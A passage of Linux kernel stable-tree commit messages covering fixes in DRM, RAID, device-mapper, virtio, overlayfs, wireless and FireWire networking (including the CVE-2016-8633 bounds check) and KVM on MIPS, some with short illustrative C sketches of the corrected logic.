aux ch assignment, include a commit message, include debug
message during init
Cc: Maarten Maathuis <madman2003@gmail.com>
Tested-by: Maarten Maathuis <madman2003@gmail.com>
References: https://bugs.freedesktop.org/show_bug.cgi?id=97877
Signed-off-by: Ville Syrjälä <ville.syrjala@linux.intel.com>
Link: http://patchwork.freedesktop.org/patch/msgid/1476208368-5710-2-git-send-email-ville.syrjala@linux.intel.com
Reviewed-by: Jim Bride <jim.bride@linux.intel.com>
(cherry picked from commit 8f7ce038f1)
Signed-off-by: Jani Nikula <jani.nikula@intel.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit a288960663 upstream.
The fbdev helper code keeps around two lists of connectors. One is the
list of all connectors it could use, and that list already holds
references for all the connectors. However the other list, or rather
lists, is the one actively being used. That list is tracked per-crtc
and currently doesn't hold any extra references. Let's grab those
extra references to avoid oopsing when the connector vanishes. The
list of all possible connectors should get updated when the hpd happens,
but the list of actively used connectors would not get updated until
the next time the fb-helper picks through the set of possible connectors.
And so we need to hang on to the connectors until that time.
Since we need to clean up in drm_fb_helper_crtc_free() as well,
let's pull the code to a common place. And while at it let's
pull in the modeset->mode cleanup in there as well. The case
of modeset->fb is a bit less clear. I'm thinking we should probably
hold a reference to it, but for now I just slapped on a FIXME.
v2: Cleanup things drm_fb_helper_crtc_free() too (Chris)
v3: Don't leak modeset->connectors (Chris)
Cc: Chris Wilson <chris@chris-wilson.co.uk>
Cc: Carlos Santa <carlos.santa@intel.com>
Cc: Kirill A. Shutemov <kirill@shutemov.name>
Tested-by: Carlos Santa <carlos.santa@intel.com> (v1)
Tested-by: Kirill A. Shutemov <kirill@shutemov.name> (v1)
Bugzilla: https://bugs.freedesktop.org/show_bug.cgi?id=97666
Signed-off-by: Ville Syrjälä <ville.syrjala@linux.intel.com>
Reviewed-by: Chris Wilson <chris@chris-wilson.co.uk>
Signed-off-by: Daniel Vetter <daniel.vetter@ffwll.ch>
Link: http://patchwork.freedesktop.org/patch/msgid/1477492878-4990-1-git-send-email-ville.syrjala@linux.intel.com
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 87d3b6588f upstream.
Since 4.7 kernel, we've seen the error messages like
kernel: [TTM] Buffer eviction failed
kernel: qxl 0000:00:02.0: object_init failed for (4026540032, 0x00000001)
kernel: [drm:qxl_alloc_bo_reserved [qxl]] *ERROR* failed to allocate VRAM BO
on QXL when switching and accessing on VT. The culprit was the
generic deferred_io code (the qxl driver switched to it in 4.7).
There is a race between the dirty clip update and the call of the
callback.
In drm_fb_helper_dirty(), the dirty clip is updated in the spinlock,
while it kicks off the update worker outside the spinlock. Meanwhile
the update worker clears the dirty clip in the spinlock, too. Thus,
when drm_fb_helper_dirty() is called concurrently, schedule_work() is
called after the clip is cleared in the first worker call.
This patch addresses it by validating the clip before calling the
dirty fb callback.
Bugzilla: https://bugs.freedesktop.org/show_bug.cgi?id=98322
Bugzilla: https://bugzilla.suse.com/show_bug.cgi?id=1003298
Fixes: eaa434defa ('drm/fb-helper: Add fb_deferred_io support')
Signed-off-by: Takashi Iwai <tiwai@suse.de>
Reviewed-by: Ville Syrjälä <ville.syrjala@linux.intel.com>
Signed-off-by: Daniel Vetter <daniel.vetter@ffwll.ch>
Link: http://patchwork.freedesktop.org/patch/msgid/20161020150530.5787-1-tiwai@suse.de
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit b0a6af8b34 upstream.
Check whether the kernel really supports power resources for a device,
otherwise the power might not be removed when the device is runtime
suspended (DSM should still work in these cases where PR does not).
This is a workaround for a problem where ACPICA and Windows 10 differ in
behavior. ACPICA does not correctly enumerate power resources within a
conditional block (due to delayed execution of such blocks) and as a
result power_resources is set to false even if _PR3 exists.
Fixes: 692a17dcc2 ("drm/nouveau/acpi: fix lockup with PCIe runtime PM")
Link: https://bugs.freedesktop.org/show_bug.cgi?id=98398
Reported-and-tested-by: Rick Kerkhof <rick.2889@gmail.com>
Reviewed-by: Mika Westerberg <mika.westerberg@linux.intel.com>
Signed-off-by: Peter Wu <peter@lekensteyn.nl>
Signed-off-by: Dave Airlie <airlied@redhat.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 537b4b462c upstream.
The read is taking a considerable amount of time (about 50us on this
machine). The register does not ever hold anything other than the ring
ID that is updated in this exact function, so there is no need for
the read modify write cycle.
This chops off a big chunk of the time spent in hardirq disabled
context, as this function is called multiple times in the interrupt
handler. With this change applied radeon won't show up in the list
of the worst IRQ latency offenders anymore, where it was a regular
before.
Reviewed-by: Christian König <christian.koenig@amd.com>
Signed-off-by: Lucas Stach <dev@lynxeye.de>
Signed-off-by: Alex Deucher <alexander.deucher@amd.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit e73aca5184 upstream.
Before accessing the u/v offset (aka u/vbo for IPUv3) of the old plane state's
relevant fb, we should make sure the fb is in the YU12 or YV12 pixel format
(which are the only two YUV pixel formats we support), otherwise we are likely
to trigger the BUG_ON() in drm_plane_state_to_u/vbo() since the fb's pixel
format is probably not YU12 or YV12.
Link: https://bugs.freedesktop.org/show_bug.cgi?id=98150
Fixes: c6c1f9bc79 ("drm/imx: Add active plane reconfiguration support")
Signed-off-by: Liu Ying <gnuiyl@gmail.com>
Signed-off-by: Philipp Zabel <p.zabel@pengutronix.de>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 43daa01323 upstream.
We added active plane reconfiguration support by forcing a full modeset
operation. So, looking at old_plane_state->fb to determine whether we need to
switch the EBA buffer (for hardware double buffering) in
ipu_plane_atomic_set_base() or not is no longer correct. Instead, we should do
that only when we don't need a modeset; otherwise, we initialize the two EBA
buffers with the buffer address.
Fixes: c6c1f9bc79 ("drm/imx: Add active plane reconfiguration support")
Signed-off-by: Liu Ying <gnuiyl@gmail.com>
Signed-off-by: Philipp Zabel <p.zabel@pengutronix.de>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 1217e1d199 upstream.
mddev->curr_resync usually records where the current resync is up to,
but during the starting phase it has some "magic" values.
1 - means that the array is trying to start a resync, but has yielded
to another array which shares physical devices, and also needs to
start a resync
2 - means the array is trying to start resync, but has found another
array which shares physical devices and has already started resync.
3 - means that resync has commenced, but it is possible that nothing
has actually been resynced yet.
It is important that this value not be visible to user-space and
particularly that it doesn't get written to the metadata, as the
resync or recovery checkpoint. In part, this is because it may be
slightly higher than the correct value, though this is very rare.
In part, because it is not a multiple of 4K, and some devices only
support 4K aligned accesses.
There are two places where this value is propagated into either
->curr_resync_completed or ->recovery_cp or ->recovery_offset.
These currently avoid the propagation of values 1 and 2, but will
allow 3 to leak through.
Change them to only propagate the value if it is > 3.
As this can cause an array to fail, the patch is suitable for -stable.
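A minimal sketch of the tightened guard described above (plain integers stand
in for the md fields):
#include <stdio.h>
/* only propagate curr_resync once it is a real sector count, i.e. past
 * the "magic" startup values 1, 2 and 3 described above */
static long long checkpoint(long long curr_resync, long long old_cp)
{
        return curr_resync > 3 ? curr_resync : old_cp;
}
int main(void)
{
        printf("%lld\n", checkpoint(3, 0));     /* startup magic: keep old value */
        printf("%lld\n", checkpoint(8192, 0));  /* real progress: propagate */
        return 0;
}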
Reported-by: Viswesh <viswesh.vichu@gmail.com>
Signed-off-by: NeilBrown <neilb@suse.com>
Signed-off-by: Shaohua Li <shli@fb.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 579ed34f7b upstream.
This is the counterpart of the raid1 fix. If a write error occurs, raid10
will try to rewrite the bio in small chunk size. If the rewrite fails,
raid10 will record the error in bad block. narrow_write_error will
always use WRITE for the bio, but actually it could be a discard. Since
a discard bio has no payload, writing the bio will cause different issues.
But a discard error isn't fatal; we can safely ignore it. This is what
this patch does.
This issue should exist since discard is added, but only exposed with
recent arbitrary bio size feature.
Cc: Sitsofe Wheeler <sitsofe@gmail.com>
Signed-off-by: Shaohua Li <shli@fb.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit e3f948cd32 upstream.
If a write error occurs, raid1 will try to rewrite the bio in small
chunk size. If the rewrite fails, raid1 will record the error in bad
block. narrow_write_error will always use WRITE for the bio, but
actually it could be a discard. Since a discard bio has no payload, writing
the bio will cause different issues. But a discard error isn't fatal; we
can safely ignore it. This is what this patch does.
This issue should exist since discard is added, but only exposed with
recent arbitrary bio size feature.
Reported-and-tested-by: Sitsofe Wheeler <sitsofe@gmail.com>
Signed-off-by: Shaohua Li <shli@fb.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 2bf7dc8443 upstream.
The arcmsr driver failed to pass SYNCHRONIZE CACHE to controller
firmware. Depending on how drive caches are handled internally by
controller firmware this could potentially lead to data integrity
problems.
Ensure that cache flushes are passed to the controller.
[mkp: applied by hand and removed unused vars]
Signed-off-by: Ching Huang <ching2048@areca.com.tw>
Reported-by: Tomas Henzl <thenzl@redhat.com>
Signed-off-by: Martin K. Petersen <martin.petersen@oracle.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit f67b107d4c upstream.
Commit 0b8e3c4ca2 ("ath10k: move cal data len to hw_params") broke retrieving
the calibration data from cal_data debugfs file. The length of file was always
zero. The reason is:
static ssize_t ath10k_debug_cal_data_read(struct file *file,
                                          char __user *user_buf,
                                          size_t count, loff_t *ppos)
{
        struct ath10k *ar = file->private_data;
        void *buf = file->private_data;
This is obviously bogus, private_data cannot contain both struct ath10k and the
buffer. Fix it by caching calibration data to ar->debug.cal_data. This also
allows it to be accessed when the device is not active (interface is down).
The cal_data buffer is fixed size because during the first firmware probe we
don't yet know what the length of the calibration data will be. It was
simplest just to use a fixed length. There's a WARN_ON() in
ath10k_debug_cal_data_fetch() if the buffer is too small.
Tested with qca988x and firmware 10.2.4.70.56.
Reported-by: Nikolay Martynov <mar.kolya@gmail.com>
Fixes: 0b8e3c4ca2 ("ath10k: move cal data len to hw_params")
Signed-off-by: Marty Faltesek <mfaltesek@google.com>
[kvalo@qca.qualcomm.com: improve commit log and minor other changes]
Signed-off-by: Kalle Valo <kvalo@qca.qualcomm.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 304e5ac118 upstream.
This reverts commit 171f6402e4 ("ath9k_hw: implement temperature compensation
support for AR9003+"). Some users report that this commit causes a regression
in performance under some conditions.
Fixes: 171f6402e4 ("ath9k_hw: implement temperature compensation support for AR9003+")
Signed-off-by: Felix Fietkau <nbd@nbd.name>
[kvalo@qca.qualcomm.com: improve commit log]
Signed-off-by: Kalle Valo <kvalo@qca.qualcomm.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit ea720935cf upstream.
In mac80211, multicast A-MSDUs are accepted in many cases that
they shouldn't be accepted in:
* drop A-MSDUs with a multicast A1 (RA), as required by the
spec in 9.11 (802.11-2012 version)
* drop A-MSDUs with a 4-addr header, since the fourth address
can't actually be useful for them; unless 4-address frame
format is actually requested, even though the fourth address
is still not useful in this case, but ignored
Accepting the first case, in particular, is very problematic
since it allows anyone else with possession of a GTK to send
unicast frames encapsulated in a multicast A-MSDU, even when
the AP has client isolation enabled.
Signed-off-by: Johannes Berg <johannes.berg@intel.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit e9300a4b7b upstream.
RFC 2734 defines the datagram_size field in fragment encapsulation
headers thus:
datagram_size: The encoded size of the entire IP datagram. The
value of datagram_size [...] SHALL be one less than the value of
Total Length in the datagram's IP header (see STD 5, RFC 791).
Accordingly, the eth1394 driver of Linux 2.6.36 and older set and got
this field with a -/+1 offset:
ether1394_tx() /* transmit */
    ether1394_encapsulate_prep()
        hdr->ff.dg_size = dg_size - 1;
ether1394_data_handler() /* receive */
    if (hdr->common.lf == ETH1394_HDR_LF_FF)
        dg_size = hdr->ff.dg_size + 1;
    else
        dg_size = hdr->sf.dg_size + 1;
Likewise, I observe OS X 10.4 and Windows XP Pro SP3 to transmit 1500
byte sized datagrams in fragments with datagram_size=1499 if link
fragmentation is required.
Only firewire-net sets and gets datagram_size without this offset. The
result is lacking interoperability of firewire-net with OS X, Windows
XP, and presumably Linux' eth1394. (I did not test with the latter.)
For example, FTP data transfers to a Linux firewire-net box with max_rec
smaller than the 1500 bytes MTU
- from OS X fail entirely,
- from Win XP start out with a bunch of fragmented datagrams which
time out, then continue with unfragmented datagrams because Win XP
temporarily reduces the MTU to 576 bytes.
So let's fix firewire-net's datagram_size accessors.
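A tiny standalone sketch of the corrected accessors' arithmetic (the function
names are illustrative, not the driver's):
#include <stdio.h>
/* RFC 2734: datagram_size is one less than the IP Total Length */
static unsigned int encode_dg_size(unsigned int total_len)
{
        return total_len - 1;
}
static unsigned int decode_dg_size(unsigned int dg_size_field)
{
        return dg_size_field + 1;
}
int main(void)
{
        unsigned int total_len = 1500;  /* typical MTU-sized datagram */
        unsigned int field = encode_dg_size(total_len);
        printf("on the wire: datagram_size=%u, decoded back to %u bytes\n",
               field, decode_dg_size(field));   /* 1499 -> 1500 */
        return 0;
}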
Note that firewire-net thereby loses interoperability with unpatched
firewire-net, but only if link fragmentation is employed. (This happens
with large broadcast datagrams, and with large datagrams on several
FireWire CardBus cards with smaller max_rec than equivalent PCI cards,
and it can be worked around by setting a small enough MTU.)
Signed-off-by: Stefan Richter <stefanr@s5r6.in-berlin.de>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 667121ace9 upstream.
The IP-over-1394 driver firewire-net lacked input validation when
handling incoming fragmented datagrams. A maliciously formed fragment
with a respectively large datagram_offset would cause a memcpy past the
datagram buffer.
So, drop any packets carrying a fragment with offset + length larger
than datagram_size.
In addition, ensure that
- GASP header, unfragmented encapsulation header, or fragment
encapsulation header actually exists before we access it,
- the encapsulated datagram or fragment is of nonzero size.
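A hedged sketch of the bounds check described above; the function and
parameter names are illustrative, not the driver's:
#include <stdbool.h>
#include <stdio.h>
/* reject fragments that would memcpy past the reassembly buffer */
static bool fragment_ok(unsigned int offset, unsigned int len,
                        unsigned int datagram_size)
{
        return len > 0 && offset < datagram_size &&
               len <= datagram_size - offset;
}
int main(void)
{
        printf("%d\n", fragment_ok(0, 1024, 1500));     /* 1: fits */
        printf("%d\n", fragment_ok(1400, 200, 1500));   /* 0: past the buffer end */
        printf("%d\n", fragment_ok(100, 0, 1500));      /* 0: zero-sized fragment */
        return 0;
}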
Reported-by: Eyal Itkin <eyal.itkin@gmail.com>
Reviewed-by: Eyal Itkin <eyal.itkin@gmail.com>
Fixes: CVE 2016-8633
Signed-off-by: Stefan Richter <stefanr@s5r6.in-berlin.de>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit da25311c7c upstream.
The Schenker XMG C504 is a rebranded Gigabyte P35 v2 laptop.
Therefore it also needs a keyboard reset to detect the Elantech touchpad.
Otherwise the touchpad appears to be dead.
With this patch the touchpad is detected:
$ dmesg | grep -E "(i8042|Elantech|elantech)"
[ 2.675399] i8042: PNP: PS/2 Controller [PNP0303:PS2K,PNP0f13:PS2M] at 0x60,0x64 irq 1,12
[ 2.680372] i8042: Attempting to reset device connected to KBD port
[ 2.789037] serio: i8042 KBD port at 0x60,0x64 irq 1
[ 2.791586] serio: i8042 AUX port at 0x60,0x64 irq 12
[ 2.813840] input: AT Translated Set 2 keyboard as /devices/platform/i8042/serio0/input/input4
[ 3.811431] psmouse serio1: elantech: assuming hardware version 4 (with firmware version 0x361f0e)
[ 3.825424] psmouse serio1: elantech: Synaptics capabilities query result 0x00, 0x15, 0x0f.
[ 3.839424] psmouse serio1: elantech: Elan sample query result 03, 58, 74
[ 3.911349] input: ETPS/2 Elantech Touchpad as /devices/platform/i8042/serio1/input/input6
Signed-off-by: Patrick Scheuring <patrick.scheuring.dev@gmail.com>
Signed-off-by: Dmitry Torokhov <dmitry.torokhov@gmail.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit ab05e5ec81 upstream.
The generic disable_rf() function clears bits 22 and 23 in
REG_RX_WAIT_CCA, however we did not re-enable them again in
rtl8723b_enable_rf().
This resolves the problem for me with 8723bu devices not working again
after reloading the driver.
Signed-off-by: Jes Sorensen <Jes.Sorensen@redhat.com>
Signed-off-by: Kalle Valo <kvalo@codeaurora.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 1e54134cca upstream.
A device running without RX packet aggregation could return more data
in the USB packet than the actual network packet. In this case we
would clone the skb but then determine that there was no
packet to handle and exit without freeing the cloned skb first.
This has so far only been observed with 8188eu devices, but could
affect others.
Signed-off-by: Jes Sorensen <Jes.Sorensen@redhat.com>
Signed-off-by: Kalle Valo <kvalo@codeaurora.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit b052b07c39 upstream.
dm-raid 1.9.0 fails to activate existing RAID4/10 devices that have the
old superblock format (which does not have takeover/reshaping support
that was added via commit 33e53f0685).
Fix validation path for old superblocks by reverting to the old raid4
layout and basing checks on mddev->new_{level,layout,...} members in
super_init_validation().
Signed-off-by: Heinz Mauelshagen <heinzm@redhat.com>
Signed-off-by: Mike Snitzer <snitzer@redhat.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 5c33677c87 upstream.
In ecbfb9f118 ("dm raid: add raid level takeover support") a new
compatible feature flag was added. Validation for these compat_features
was added but this only passes for new raid mappings with this feature
flag. This causes previously created raid mappings to be failed at
import.
Check compat_features for the only valid combination.
Fixes: ecbfb9f118 ("dm raid: add raid level takeover support")
Signed-off-by: Andy Whitcroft <apw@canonical.com>
Signed-off-by: Heinz Mauelshagen <heinzm@redhat.com>
Signed-off-by: Mike Snitzer <snitzer@redhat.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 937fa62e8a upstream.
cleanup_mapped_device() calls kthread_stop() if kworker_task is
non-NULL. Currently the assigned value could be a valid task struct or
an error code (e.g. -ENOMEM). Reset md->kworker_task to NULL if
kthread_run() returned an error.
Fixes: 7193a9defc ("dm rq: check kthread_run return for .request_fn request-based DM")
Reported-by: Tahsin Erdogan <tahsin@google.com>
Signed-off-by: Mike Snitzer <snitzer@redhat.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit dafa724bf5 upstream.
dm_get_target_type() was previously called so any error returned from
dm_table_add_target() must first call dm_put_target_type(). Otherwise
the DM target module's reference count will leak and the associated
kernel module will be unable to be removed.
Also, leverage the fact that r is already -EINVAL and remove an extra
newline.
Fixes: 36a0456 ("dm table: add immutable feature")
Fixes: cc6cbe1 ("dm table: add always writeable feature")
Fixes: 3791e2f ("dm table: add singleton feature")
Signed-off-by: tang.junhui <tang.junhui@zte.com.cn>
Signed-off-by: Mike Snitzer <snitzer@redhat.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit dcb2ff5641 upstream.
If a default leg has failed, any read will cause a new operational
default leg to be selected and the read is resubmitted. But until now
the read will return failure even though it was successful due to
resubmission. The reason for this is bio->bi_error was not being
cleared before resubmitting the bio.
Fix by clearing bio->bi_error before resubmission.
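A tiny userspace analogue of the retry path, assuming a fake_bio stand-in for
struct bio:
#include <stdio.h>
struct fake_bio { int bi_error; };      /* illustrative stand-in, not struct bio */
static int read_leg(struct fake_bio *bio, int leg)
{
        if (leg == 0) {                 /* the default leg has failed */
                bio->bi_error = -5;     /* -EIO */
                return -1;
        }
        return 0;                       /* resubmitted read succeeds */
}
int main(void)
{
        struct fake_bio bio = { 0 };
        if (read_leg(&bio, 0) < 0) {
                /* fix: clear the stale error before resubmitting, otherwise
                 * the successful retry still reports -EIO to the caller */
                bio.bi_error = 0;
                read_leg(&bio, 1);
        }
        printf("final bi_error: %d\n", bio.bi_error);   /* 0 with the fix */
        return 0;
}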
Fixes: 4246a0b63b ("block: add a bi_error field to struct bio")
Signed-off-by: Heinz Mauelshagen <heinzm@redhat.com>
Signed-off-by: Mike Snitzer <snitzer@redhat.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 34563769e4 upstream.
Commit c6017e793b ("virtio: console: add locks around buffer removal
in port unplug path") added locking around the freeing of buffers in the
vq. However, when free_buf() is called with can_sleep = true and rproc
is enabled, it calls dma_free_coherent() directly, requiring interrupts
to be enabled. Currently a WARNING is triggered due to the spin locking
around free_buf, with a call stack like this:
WARNING: CPU: 3 PID: 121 at ./include/linux/dma-mapping.h:433
free_buf+0x1a8/0x288
Call Trace:
[<8040c538>] show_stack+0x74/0xc0
[<80757240>] dump_stack+0xd0/0x110
[<80430d98>] __warn+0xfc/0x130
[<80430ee0>] warn_slowpath_null+0x2c/0x3c
[<807e7c6c>] free_buf+0x1a8/0x288
[<807ea590>] remove_port_data+0x50/0xac
[<807ea6a0>] unplug_port+0xb4/0x1bc
[<807ea858>] virtcons_remove+0xb0/0xfc
[<807b6734>] virtio_dev_remove+0x58/0xc0
[<807f918c>] __device_release_driver+0xac/0x134
[<807f924c>] device_release_driver+0x38/0x50
[<807f7edc>] bus_remove_device+0xfc/0x130
[<807f4b74>] device_del+0x17c/0x21c
[<807f4c38>] device_unregister+0x24/0x38
[<807b6b50>] unregister_virtio_device+0x28/0x44
Fix this by restructuring the loops to allow the locks to only be taken
where it is necessary to protect the vqs, and released while the
buffer is being freed.
Fixes: c6017e793b ("virtio: console: add locks around buffer removal in port unplug path")
Signed-off-by: Matt Redfearn <matt.redfearn@imgtec.com>
Signed-off-by: Michael S. Tsirkin <mst@redhat.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit a0be1db430 upstream.
Legacy virtio defines the virtqueue base using a 32-bit PFN field, with
a read-only register indicating a fixed page size of 4k.
This can cause problems for DMA allocators that allocate top down from
the DMA mask, which is set to 64 bits. In this case, the addresses are
silently truncated to 44-bit, leading to IOMMU faults, failure to read
from the queue or data corruption.
This patch restricts the coherent DMA mask for legacy PCI virtio devices
to 44 bits, which matches the specification.
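The 44 bit figure follows directly from the legacy layout described above: a
32 bit queue PFN register combined with the fixed 4 KiB page size. A quick
standalone check:
#include <stdio.h>
int main(void)
{
        int pfn_bits = 32;      /* legacy virtio queue PFN register */
        int page_shift = 12;    /* fixed 4 KiB page size */
        unsigned long long max_addr =
                ((unsigned long long)1 << (pfn_bits + page_shift)) - 1;
        printf("addressable bits: %d, highest base: 0x%llx\n",
               pfn_bits + page_shift, max_addr);        /* 44 bits */
        return 0;
}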
Cc: Andy Lutomirski <luto@kernel.org>
Cc: Michael S. Tsirkin <mst@redhat.com>
Cc: Benjamin Serebrin <serebrin@google.com>
Signed-off-by: Will Deacon <will.deacon@arm.com>
Signed-off-by: Michael S. Tsirkin <mst@redhat.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 0ea1e4a6d9 upstream.
According to the spec, if the VIRTIO_RING_F_EVENT_IDX feature bit is
negotiated the driver MUST set flags to 0. Not dirtying the available
ring in virtqueue_disable_cb also has a minor positive performance
impact, improving L1 dcache load misses by ~0.5% in vring_bench.
Writes to the used event field (vring_used_event) are still unconditional.
Cc: Michael S. Tsirkin <mst@redhat.com>
Signed-off-by: Ladi Prosek <lprosek@redhat.com>
Signed-off-by: Michael S. Tsirkin <mst@redhat.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 6ed518328d upstream.
We have one critical section in the syscall entry path in which we switch from
the userspace stack to kernel stack. In the event of an external interrupt, the
interrupt code distinguishes between those two states by analyzing the value of
sr7. If sr7 is zero, it uses the kernel stack. Therefore it's important, that
the value of sr7 is in sync with the currently enabled stack.
This patch now disables interrupts while executing the critical section. This
prevents the interrupt handler from possibly seeing an inconsistent state,
which in the worst case can lead to crashes.
Interestingly, in the syscall exit path interrupts were already disabled in the
critical section which switches back to the userspace stack.
Signed-off-by: John David Anglin <dave.anglin@bell.net>
Signed-off-by: Helge Deller <deller@gmx.de>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 641089c154 upstream.
Make sure the copied up file hits the disk before renaming to the final
destination. If this is not done then the copy-up may corrupt the data in
the file in case of a crash.
Signed-off-by: Miklos Szeredi <mszeredi@redhat.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit fd3220d37b upstream.
This change fixes xfstest generic/375, which failed to clear the
setgid bit in the following test case on overlayfs:
touch $testfile
chown 100:100 $testfile
chmod 2755 $testfile
_runas -u 100 -g 101 -- setfacl -m u::rwx,g::rwx,o::rwx $testfile
Reported-by: Amir Goldstein <amir73il@gmail.com>
Signed-off-by: Miklos Szeredi <mszeredi@redhat.com>
Tested-by: Amir Goldstein <amir73il@gmail.com>
Fixes: d837a49bd5 ("ovl: fix POSIX ACL setting")
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit b93d4a0eb3 upstream.
tmpfs doesn't have ->get_acl() because it only uses cached acls.
This fixes the acl tests in pjdfstest when tmpfs is used as the upper layer
of the overlay.
Reported-by: Amir Goldstein <amir73il@gmail.com>
Signed-off-by: Miklos Szeredi <mszeredi@redhat.com>
Fixes: 39a25b2b37 ("ovl: define ->get_acl() for overlay inodes")
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 1b283eea62 upstream.
This fixes a very annoying regression on the Snowball SD card
that has been around for a while. It turns out that the device
tree does not configure the direction pins properly, nor sets
up the pins for the voltage converter properly at boot. Unless
all things are correctly set up, the feedback clock will not
work, and makes the driver spew messages in the console (but
it works, very slowly):
root@Ux500:/ mount /dev/mmcblk0p2 /mnt/
[ 9.953460] mmci-pl18x 80126000.sdi0_per1: error during DMA transfer!
[ 9.960296] mmcblk0: error -110 sending status command, retrying
[ 9.966461] mmcblk0: error -110 sending status command, retrying
[ 9.972534] mmcblk0: error -110 sending status command, aborting
Fix this by rectifying the device tree to correspond to that of
the Ux500 HREF boards plus the DAT31DIR setting that is unique for
the Snowball, and things start working smoothly. Add in the SDR12
and SDR25 modes which this host can do without any problems.
I don't know if this has ever been correct, sadly. It works after
this patch.
Reported-by: Daniel Lezcano <daniel.lezcano@linaro.org>
Cc: Ulf Hansson <ulf.hansson@linaro.org>
Signed-off-by: Linus Walleij <linus.walleij@linaro.org>
Signed-off-by: Olof Johansson <olof@lixom.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 33c45ef8ad upstream.
Since the commit bd3677ff31 ("clk: mvebu: Remove corediv clock from
Armada XP"), the corediv clk is no more selected for Armada XP, however
this clock is used for Armada XP using the compatible
armada-370-corediv-clock.
While since commit 1594d568c6 ("clk: mvebu: Move corediv config to
mvebu config") Armada 38x and Armada 375 got corediv support again, not
only Armada XP was missed but also Armada 39x.
Actually all the SoC selecting MVEBU_V7 config need this clock:
git grep "\-corediv-clock" arch/arm/boot/dts
arch/arm/boot/dts/armada-370-xp.dtsi: compatible = "marvell,armada-370-corediv-clock";
arch/arm/boot/dts/armada-375.dtsi: compatible = "marvell,armada-375-corediv-clock";
arch/arm/boot/dts/armada-38x.dtsi: compatible = "marvell,armada-380-corediv-clock";
arch/arm/boot/dts/armada-39x.dtsi: compatible = "marvell,armada-390-corediv-clock"
This commit now fixes this behavior by letting MVEBU_V7 select
MVEBU_CLK_COREDIV.
Fixes: bd3677ff31 ("clk: mvebu: Remove corediv clock from Armada XP")
Reported-by: Uwe Kleine-König <u.kleine-koenig@pengutronix.de>
Acked-by: Uwe Kleine-König <u.kleine-koenig@pengutronix.de>
Signed-off-by: Gregory CLEMENT <gregory.clement@free-electrons.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit e1e575f6b0 upstream.
The advancing of the PC when completing an MMIO load is done before
re-entering the guest, i.e. before restoring the guest ASID. However if
the load is in a branch delay slot it may need to access guest code to
read the prior branch instruction. This isn't safe in TLB mapped code at
the moment, nor in the future when we'll access unmapped guest segments
using direct user accessors too, as it could read the branch from host
user memory instead.
Therefore calculate the resume PC in advance while we're still in the
right context and save it in the new vcpu->arch.io_pc (replacing the no
longer needed vcpu->arch.pending_load_cause), and restore it on MMIO
completion.
Fixes: e685c689f3 ("KVM/MIPS32: Privileged instruction/target branch emulation.")
Signed-off-by: James Hogan <james.hogan@imgtec.com>
Cc: Paolo Bonzini <pbonzini@redhat.com>
Cc: "Radim Krčmář" <rkrcmar@redhat.com>
Cc: Ralf Baechle <ralf@linux-mips.org>
Cc: linux-mips@linux-mips.org
Cc: kvm@vger.kernel.org
Signed-off-by: Paolo Bonzini <pbonzini@redhat.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit ede5f3e7b5 upstream.
The ERET instruction to return from exception is used for returning from
exception level (Status.EXL) and error level (Status.ERL). If both bits
are set however we should be returning from ERL first, as ERL can
interrupt EXL, for example when an NMI is taken. KVM however checks EXL
first.
Fix the order of the checks to match the pseudocode in the instruction
set manual.
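A minimal sketch of the corrected check order (the Status bit positions follow
the usual MIPS convention of EXL at bit 1 and ERL at bit 2, used here for
illustration only):
#include <stdio.h>
#define ST0_EXL (1u << 1)       /* exception level, illustrative define */
#define ST0_ERL (1u << 2)       /* error level, illustrative define */
/* ERET pseudocode: error level is checked before exception level */
static const char *eret_target(unsigned int status)
{
        if (status & ST0_ERL)
                return "ErrorEPC (clear ERL)";
        if (status & ST0_EXL)
                return "EPC (clear EXL)";
        return "undefined";
}
int main(void)
{
        /* NMI taken while already handling an exception: both bits set */
        printf("%s\n", eret_target(ST0_EXL | ST0_ERL)); /* ErrorEPC */
        return 0;
}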
Fixes: e685c689f3 ("KVM/MIPS32: Privileged instruction/target branch emulation.")
